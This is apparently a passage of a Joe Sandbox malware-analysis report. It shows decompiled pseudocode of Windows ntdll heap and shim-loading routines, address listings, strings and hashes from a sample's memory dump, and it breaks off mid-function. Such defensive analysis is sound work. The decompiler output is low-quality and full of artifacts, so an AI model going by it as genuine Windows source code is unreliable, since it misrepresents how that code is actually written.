						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E3288753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x329847d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E328A3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								L32940D24( *((intOrPtr*)(_t165 - 0x30)));
								E32940835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x329847d4;
							if( *0x329847d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E3294D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E328C3AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x329847d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x329847d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E3288B910();
								} else {
									E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E3293823A(_t162,  *(_t165 - 0x20)));
								E3288B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x329847a1 = 1;
									 *0x32984100 = 0;
									asm("int3");
									 *0x329847a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E3288B910();
						} else {
							E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E3288B910("About to free block at %p\n",  *0x329847d0);
						goto L30;
					}
				} else {
					_t164 =  *0x32983750; // 0x0
					 *0x329891e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}

0x3293f8f8
0x3293f8fa
0x3293f8ff
0x3293f906
0x3293f909
0x3293f90b
0x3293f910
0x3293f912
0x3293f915
0x3293f91f
0x3293f93e
0x3293f941
0x3293f94f
0x3293f954
0x3293f956
0x3293fb8c
0x3293fb8e
0x3293fb91
0x3293fb91
0x3293fb94
0x3293fb9b
0x3293fba0
0x00000000
0x3293fba0
0x3293f95f
0x3293f962
0x3293f96c
0x3293f96f
0x3293f972
0x3293f97a
0x3293f97f
0x3293f986
0x3293f986
0x3293f98b
0x3293f98b
0x3293f992
0x3293f99a
0x3293f99d
0x3293f9a1
0x3293f9aa
0x3293f9aa
0x3293f9aa
0x3293f9ac
0x3293f9af
0x3293f9b7
0x3293f9b9
0x3293f9be
0x3293f9c0
0x00000000
0x3293f9c6
0x3293f9c9
0x3293f9cf
0x3293f9d5
0x3293fa1b
0x3293fa1e
0x3293fa21
0x3293fa26
0x3293fb2b
0x3293fb37
0x3293fb39
0x3293fb41
0x3293fb4b
0x00000000
0x3293fb4b
0x3293fa2c
0x3293fa33
0x00000000
0x00000000
0x3293fa39
0x3293fa3c
0x3293fa3f
0x3293fa42
0x3293fa47
0x3293fa49
0x3293fa4c
0x3293fa51
0x3293fa54
0x3293fa56
0x3293fa5b
0x3293fa60
0x3293fa60
0x3293fa54
0x3293fa63
0x3293fa67
0x3293fa79
0x3293fa7c
0x3293fa7f
0x3293fa69
0x3293fa6b
0x3293fa70
0x3293fa73
0x3293fa73
0x3293fa82
0x3293fa84
0x3293fa88
0x3293fa8b
0x3293fa8d
0x3293fa90
0x3293fa95
0x3293fa9b
0x3293fa9b
0x3293fa9b
0x3293fa9d
0x3293faa0
0x3293faa6
0x3293faad
0x00000000
0x00000000
0x3293fab3
0x3293faba
0x00000000
0x00000000
0x3293fabc
0x3293fac2
0x3293fac5
0x3293fae4
0x3293fae9
0x3293fac7
0x3293fadc
0x3293fae1
0x3293fafa
0x3293fb03
0x3293fb0b
0x3293fb0b
0x3293fb11
0x3293fb15
0x3293fb17
0x3293fb1e
0x3293fb24
0x3293fb25
0x3293fb25
0x3293fb15
0x00000000
0x3293faa0
0x3293f9d7
0x3293f9da
0x3293f9f9
0x3293f9fe
0x3293f9dc
0x3293f9f1
0x3293f9f6
0x3293fa0f
0x00000000
0x3293fa15
0x3293f921
0x3293f926
0x3293f92e
0x3293f936
0x3293fba2
0x3293fba5
0x3293fbb1
0x3293fbb1

APIs

RtlDebugPrintTimes.NTDLL ref: 3293F92E

Strings

HEAP[%wZ]: , xrefs: 3293F9EC, 3293FAD7
RtlFreeHeap, xrefs: 3293F948, 3293F9B2
HEAP: , xrefs: 3293F9F9, 3293FAE4
About to free block at %p, xrefs: 3293FA0A
About to free block at %p with tag %ws, xrefs: 3293FAFE

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: fe7576acdf8dca0341e1351fc8a3c5e88a27db1acbc7fced4365addab961fd82
Instruction ID: 8df0d51c0ea852084a212422eaf50ec6136ff4a40df855947a3b3a4a9ad0c061
Opcode Fuzzy Hash: fe7576acdf8dca0341e1351fc8a3c5e88a27db1acbc7fced4365addab961fd82
Instruction Fuzzy Hash: BD713278906684EFDB02CFA8D890AADFBF2FF48304F048099E558EB351DB759981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 32886565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E32886565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x3298b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E328AE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x32989200; // 0x0
				_push("true");
				_pop(_t113);
				 *0x329865f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E328BE7E0(_t92, _v92);
					}
					_t114 =  *0x32989210; // 0x0
					asm("ror esi, cl");
					 *0x329891e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x32989218; // 0x0
					_push("true");
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E3289FED0(0x329832d8);
					_t98 = 0x32985d8c;
					if( *0x329865f0 != 0) {
						_t56 =  *0x32985d8c; // 0x2552ce0
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x32985d8c; // 0x2552ce0
						if( *0x329865f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x329865f0 = 1;
							 *0x329865f8 = 0;
							E3289E740(_t98);
							E3288676F(_t98);
							return E328D4B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x329832d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x2552ca8
								_t98 =  *_t24;
								E32886704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x32985d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E328D5050(_t92,  &_v108, _t110);
					_t92 = E32886B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x329837c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E3290E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x329837c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					L328C7DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x329891e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E328AD3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E328B16EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x329837c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E3290E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x329837c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						L32911D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						L328D2C70();
						_push("true");
						_pop(_t113);
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_push("true");
				_pop(_t113);
				goto L8;
			}

0x32886574
0x3288657d
0x32886581
0x3288658b
0x32886590
0x32886598
0x328865a1
0x328865a3
0x328865a6
0x328865ad
0x328865b1
0x328865b3
0x328865b8
0x32886637
0x32886637
0x3288663a
0x3288663e
0x328866fa
0x328866fa
0x3288664c
0x32886659
0x3288665f
0x32886665
0x32886667
0x3288666f
0x32886678
0x3288667d
0x32886684
0x32886686
0x32886692
0x32886697
0x328e98c3
0x328e98d3
0x328e98d3
0x328e98d5
0x00000000
0x00000000
0x328e98ca
0x328e98cd
0x328e98cd
0x328e98cd
0x328e98d1
0x328e98d1
0x00000000
0x3288669d
0x3288669d
0x328866a4
0x328866aa
0x328866ac
0x328866ac
0x328866b0
0x328866c9
0x328866cb
0x328866d7
0x328866dc
0x328866e1
0x328866f6
0x328866b2
0x328866b2
0x328866b2
0x328866b5
0x328866b7
0x328866b7
0x328866ba
0x328866bf
0x328866c1
0x00000000
0x328866b2
0x328866b0
0x00000000
0x00000000
0x00000000
0x328865ba
0x328865ba
0x328865bf
0x328865d5
0x328865d9
0x328e9835
0x328e983a
0x328e983c
0x328e983e
0x328e9859
0x328e985e
0x328e9863
0x328e9863
0x328e9866
0x328e9868
0x328e986a
0x328e986a
0x328e986d
0x00000000
0x328e986d
0x328865e2
0x328865ec
0x328865f1
0x328865f4
0x328865f7
0x328865fb
0x3288660f
0x32886614
0x3288661a
0x3288661c
0x3288661f
0x00000000
0x3288661f
0x32886602
0x32886606
0x328e9875
0x328e987a
0x328e987c
0x328e987e
0x328e9880
0x328e989a
0x328e989f
0x328e98a4
0x328e98a7
0x328e98a9
0x328e98ab
0x328e98ab
0x328e98ac
0x328e98ae
0x328e98b3
0x328e98b4
0x328e98b6
0x328e98bb
0x328e98bd
0x00000000
0x328e98bd
0x3288660c
0x00000000
0x32886624
0x3288662a
0x3288662f
0x32886634
0x32886636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 32886614
RtlDebugPrintTimes.NTDLL ref: 3288665F

Strings

LdrpLoadShimEngine, xrefs: 328E984A, 328E988B
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328E9885
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328E9843
minkernel\ntdll\ldrinit.c, xrefs: 328E9854, 328E9895

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: fdbb5dab19581f022c88a9ad19a2bc3f5e96cafbce976c2a4b1bcd2c6817492d
Instruction ID: 61e81d068d3b5381171c13ca5437921f4167c6fa07477aa468f997068e491ec7
Opcode Fuzzy Hash: fdbb5dab19581f022c88a9ad19a2bc3f5e96cafbce976c2a4b1bcd2c6817492d
Instruction Fuzzy Hash: 4C51253AA053689FEB04DFACCC54FAD77A6AF44314F080525E965BF296DBB09C46C780

Uniqueness

Uniqueness Score: -1.00%

Function 328BDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133
timeCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E328BDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E32959335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3294F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x3298376c; // 0x0
					 *0x329891e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3288B910();
					} else {
						E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3288B910("Invalid heap signature for heap at %p", _t93);
					E3288B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E3288B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x329847a1 = 1;
						asm("int3");
						 *0x329847a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E3292AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E328BFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E328BBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E328BF300(_t92, _t74);
					}
				}
				goto L6;
			}

0x328bda2a
0x328bda35
0x328ff408
0x328bda90
0x328bda96
0x328bda9b
0x328ff510
0x00000000
0x00000000
0x328ff51f
0x328bdaa6
0x328bdaa9
0x328ff537
0x328ff53f
0x328ff53f
0x328ff537
0x00000000
0x328bdaaf
0x328bdaa1
0x328bdaa1
0x00000000
0x328bdaa1
0x328bda42
0x328ff413
0x328ff41b
0x00000000
0x328ff421
0x328bda4f
0x328ff432
0x328ff451
0x328ff456
0x328ff434
0x328ff449
0x328ff44e
0x328ff462
0x328ff471
0x328ff476
0x328ff47b
0x328ff48d
0x328ff48f
0x328ff496
0x328ff497
0x328ff497
0x00000000
0x328ff49e
0x328bda59
0x00000000
0x00000000
0x328bda5b
0x328bda66
0x328bda6d
0x328bda6d
0x328bda71
0x00000000
0x00000000
0x328bda73
0x328bda77
0x328bda7f
0x328bda80
0x328bda84
0x328bda8a
0x328ff4a8
0x328ff4ab
0x328ff4ab
0x328ff4b0
0x328ff4b3
0x328ff4b8
0x328ff4c1
0x328ff4c1
0x328ff4c4
0x328ff4c8
0x328ff4cb
0x328ff4ce
0x328ff4d5
0x328ff4d8
0x328ff4db
0x328ff4e1
0x00000000
0x00000000
0x328ff4e7
0x328ff4ec
0x328ff4ec
0x328ff4f0
0x328ff4f3
0x328ff4f9
0x328ff503
0x328ff503
0x328ff4f9
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328FF41B

Strings

HEAP[%wZ]: , xrefs: 328FF444
, passed to %s, xrefs: 328FF46C
RtlUnlockHeap, xrefs: 328FF467
Invalid heap signature for heap at %p, xrefs: 328FF45D
HEAP: , xrefs: 328FF451

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 36e6df5814735aeb9ccf23838b1d0072e8fe481875cf0cb3912cf676a577aad8
Instruction ID: d3cfb86eeac39485f8552ef559a5d02375daa10687c164d720cff6755280c7d4
Opcode Fuzzy Hash: 36e6df5814735aeb9ccf23838b1d0072e8fe481875cf0cb3912cf676a577aad8
Instruction Fuzzy Hash: 4641483D604704EFEB11CF68C844B59B7A4FF51368F0485ACE919973D1CB79A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 328BDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E328BDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E32959109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3294F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x32983768; // 0x0
					 *0x329891e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3288B910();
					} else {
						E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3288B910("Invalid heap signature for heap at %p", _t53);
					E3288B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E3288B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x329847a1 = 1;
						asm("int3");
						 *0x329847a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E3289FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x328bdac8
0x328bdacb
0x328bdad6
0x328ff54e
0x328bdb0e
0x328bdb14
0x328bdb19
0x328ff5ee
0x00000000
0x00000000
0x328ff5fd
0x328bdb24
0x328bdb27
0x328ff614
0x328ff61c
0x328ff61c
0x328ff614
0x328bdb2d
0x328bdb2f
0x328bdb31
0x328bdb31
0x328bdb1f
0x328bdb1f
0x00000000
0x328bdb1f
0x328bdae3
0x328ff559
0x328ff561
0x328ff567
0x00000000
0x328ff567
0x328bdaf0
0x328ff578
0x328ff597
0x328ff59c
0x328ff57a
0x328ff58f
0x328ff594
0x328ff5a8
0x328ff5b7
0x328ff5bc
0x328ff5c1
0x328ff5d3
0x328ff5d5
0x328ff5dc
0x328ff5dd
0x328ff5dd
0x328ff5e4
0x00000000
0x328bdaf6
0x328bdafa
0x328bdb02
0x328bdb07
0x328bdb07
0x00000000
0x328bdafa

APIs

RtlDebugPrintTimes.NTDLL ref: 328FF561

Strings

HEAP[%wZ]: , xrefs: 328FF58A
, passed to %s, xrefs: 328FF5B2
RtlLockHeap, xrefs: 328FF5AD
Invalid heap signature for heap at %p, xrefs: 328FF5A3
HEAP: , xrefs: 328FF597

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: be26625bd1743aa53b169b45b624b0e7a2431058d106e20f92ab1335c12b6392
Instruction ID: bf74b386aeda9f425f5e224240875e7c718b1f0cf6db2f98ce66184897e749a7
Opcode Fuzzy Hash: be26625bd1743aa53b169b45b624b0e7a2431058d106e20f92ab1335c12b6392
Instruction Fuzzy Hash: 8831473D105784FFFB26CB28C804F5977E4EF05758F044488E819977A1CBBAD980CA51

Uniqueness

Uniqueness Score: -1.00%

Function 32899046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E32899046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push("true");
				_push(0x3296be98);
				L328E7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				L328D8F40(_t156 - 0x13c, 0, "true");
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E328A9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x329865e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E328AA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E328B5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E328B04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x329865e0; // 0x75c5a680
							 *0x329891e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
